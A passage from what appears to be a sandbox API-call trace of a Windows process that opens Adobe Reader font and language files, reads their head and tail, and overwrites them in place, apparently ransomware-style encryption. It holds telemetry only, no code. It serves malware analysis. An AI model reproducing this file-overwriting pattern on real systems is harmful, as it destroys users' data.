lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0096.918] CloseHandle (hObject=0x1ec) returned 1 [0096.919] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\CourierStd.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\courierstd.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0096.919] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.920] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x8c8c [0096.920] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.920] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.920] ReleaseMutex (hMutex=0x168) returned 1 [0096.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CourierStd.otf", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CourierStd.otf", cchWideChar=14, lpMultiByteStr=0x1f7342c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CourierStd.otf", lpUsedDefaultChar=0x0) returned 14 [0096.920] ReadFile (in: hFile=0x1ec, lpBuffer=0x2665868, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0096.935] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7c8c [0096.935] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.939] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7c8c [0096.939] WriteFile (in: hFile=0x1ec, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.940] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0096.940] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0096.940] CloseHandle (hObject=0x1ec) returned 1 [0096.940] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-regular.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0096.941] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.941] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x17098 [0096.941] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.942] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.942] ReleaseMutex (hMutex=0x168) returned 1 [0096.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MyriadPro-Regular.otf", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MyriadPro-Regular.otf", cchWideChar=21, lpMultiByteStr=0x1f88b2c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MyriadPro-Regular.otf", lpUsedDefaultChar=0x0) returned 21 [0096.942] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0096.968] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x16098 [0096.968] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.992] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x16098 [0096.992] WriteFile (in: hFile=0x1ec, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.995] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0096.995] WriteFile (in: hFile=0x1ec, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0096.996] CloseHandle (hObject=0x1ec) returned 1 [0096.996] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_AE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ae.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0096.997] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.997] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6c88 [0096.997] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0096.997] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.997] ReleaseMutex (hMutex=0x168) returned 1 [0096.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_AE.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0096.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_AE.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_AE.txt", lpUsedDefaultChar=0x0) returned 30 [0096.997] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.052] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5c88 [0097.053] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.065] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5c88 [0097.065] WriteFile (in: hFile=0x1ec, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.066] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0097.066] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.066] CloseHandle (hObject=0x1ec) returned 1 [0097.066] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LB.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_lb.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0097.067] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0097.067] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6c96 [0097.067] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0097.067] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.067] ReleaseMutex (hMutex=0x168) returned 1 [0097.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_LB.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0097.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_LB.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_LB.txt", lpUsedDefaultChar=0x0) returned 30 [0097.067] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.074] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5c96 [0097.074] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.089] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5c96 [0097.089] WriteFile (in: hFile=0x1ec, lpBuffer=0x28729e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28729e8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.090] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0097.090] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.090] CloseHandle (hObject=0x1ec) returned 1 [0097.091] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_TN.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_tn.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0097.092] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0097.092] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6c96 [0097.092] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0097.092] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.093] ReleaseMutex (hMutex=0x168) returned 1 [0097.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_TN.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0097.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_TN.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_TN.txt", lpUsedDefaultChar=0x0) returned 30 [0097.093] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.103] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5c96 [0097.103] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.127] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5c96 [0097.128] WriteFile (in: hFile=0x1ec, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.129] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0097.129] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.129] CloseHandle (hObject=0x1ec) returned 1 [0097.129] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs_CZ.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs_cz.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0097.130] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0097.130] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x74c0 [0097.130] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0097.130] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.130] ReleaseMutex (hMutex=0x168) returned 1 [0097.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.cs_CZ.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0097.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.cs_CZ.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.cs_CZ.txt", lpUsedDefaultChar=0x0) returned 30 [0097.131] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.133] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x64c0 [0097.133] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.134] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x64c0 [0097.134] WriteFile (in: hFile=0x1ec, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.134] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0097.134] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.134] CloseHandle (hObject=0x1ec) returned 1 [0097.134] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr_preeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0097.135] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0097.135] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6e76 [0097.135] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0097.136] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.136] ReleaseMutex (hMutex=0x168) returned 1 [0097.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.el_GR_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0097.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.el_GR_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.el_GR_PREEURO.txt", lpUsedDefaultChar=0x0) returned 38 [0097.136] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.193] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5e76 [0097.193] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.203] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x5e76 [0097.203] WriteFile (in: hFile=0x1ec, lpBuffer=0x28729e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28729e8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.204] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0097.205] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.205] CloseHandle (hObject=0x1ec) returned 1 [0097.253] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_BO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_bo.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0099.391] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.392] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6ec8 [0099.392] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.392] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.394] ReleaseMutex (hMutex=0x168) returned 1 [0099.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_BO.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.396] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_BO.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, 